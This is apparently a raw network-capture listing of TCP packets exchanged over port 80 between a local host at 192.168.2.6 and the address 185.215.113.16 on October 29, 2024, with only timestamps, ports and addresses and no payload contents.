Oct 29, 2024 06:59:25.245049953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245083094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245100021 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.245111942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245146990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245165110 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.245181084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245229959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245239973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.245263100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245296001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245313883 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.245332956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245382071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280415058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280446053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280462980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280493975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280508041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280524969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280544996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280601978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280617952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280632973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280654907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280658007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280673027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280689955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280695915 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280706882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280725002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280734062 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280765057 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280792952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280808926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280823946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280838966 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280855894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280879974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280919075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280951977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.280961037 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.280966997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281016111 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281025887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281042099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281092882 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281115055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281160116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281173944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281189919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281204939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281233072 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281291962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281349897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281364918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281394958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281436920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281450987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281466007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281486034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281512022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281519890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281536102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281549931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281575918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281636000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281650066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281666994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281675100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281692982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281708956 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281709909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281745911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281871080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281887054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281900883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281934977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281945944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281950951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281966925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.281970024 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.281984091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282004118 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282031059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282044888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282058954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282072067 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282095909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282282114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282296896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282330036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282346010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282351017 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282361031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282399893 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282423973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282438993 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282466888 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282475948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282491922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282507896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282515049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.282536983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.282548904 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.295866966 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.323424101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.323492050 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.323615074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363603115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363619089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363634109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363648891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363656044 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363699913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363728046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363743067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363758087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363775015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363781929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363790989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363795996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363816023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363831997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363840103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363852978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363874912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363878012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363892078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363914013 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.363945961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363960981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363976002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.363997936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364020109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364021063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364108086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364121914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364136934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364156961 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364161968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364177942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364185095 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364218950 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364229918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364247084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364259958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364279032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364285946 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364296913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364312887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364460945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364475012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364490032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364501953 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364528894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364589930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364603996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364619017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364634991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364643097 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.364651918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364686012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.364690065 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.365029097 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.388381004 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.399823904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399859905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399876118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399926901 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.399960995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399975061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399987936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.399997950 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400002956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400042057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400043964 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400059938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400083065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400085926 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400099993 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400116920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400129080 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400134087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400161028 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400216103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400262117 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400265932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400283098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400301933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400317907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400324106 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400362968 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400394917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400412083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400427103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400444031 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400484085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400527000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400541067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400562048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400563002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400578976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400594950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400599957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400624990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400702000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400717974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400732994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400754929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400778055 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400804043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400820017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400855064 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400897026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400929928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400944948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400969982 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.400983095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.400998116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401014090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401041985 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401065111 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401077986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401093960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401109934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401130915 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401257038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401273012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401298046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401309967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401338100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401357889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401374102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401388884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401415110 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401495934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401537895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401554108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401582956 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401599884 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401607037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401624918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401639938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401654959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401665926 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401675940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401690960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401740074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401801109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401817083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401844025 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401869059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401873112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401889086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401923895 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.401982069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.401997089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402013063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402044058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.402070045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402086020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402101040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402112961 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.402117968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402144909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.402151108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402167082 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402182102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.402188063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.402224064 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.469333887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483084917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483138084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483192921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483222008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483433008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483453035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483464003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483475924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483495951 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483501911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483515024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483525038 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483529091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483567953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483575106 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483576059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483582020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483596087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483612061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483619928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483653069 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483658075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483709097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483731985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483743906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483769894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483798981 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483843088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483856916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483892918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.483922005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483942986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483956099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.483999014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484004974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484011889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484024048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484035969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484049082 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484054089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484057903 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484086037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484098911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484102011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484124899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484138966 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484148026 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484149933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484169960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484219074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484231949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484260082 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.484285116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484297037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.484329939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519464970 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519511938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519521952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519556046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519587040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519665003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519676924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519690037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519711971 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519715071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519740105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519748926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519756079 CET	49769	80	192.168.2.6	185.215.113.16
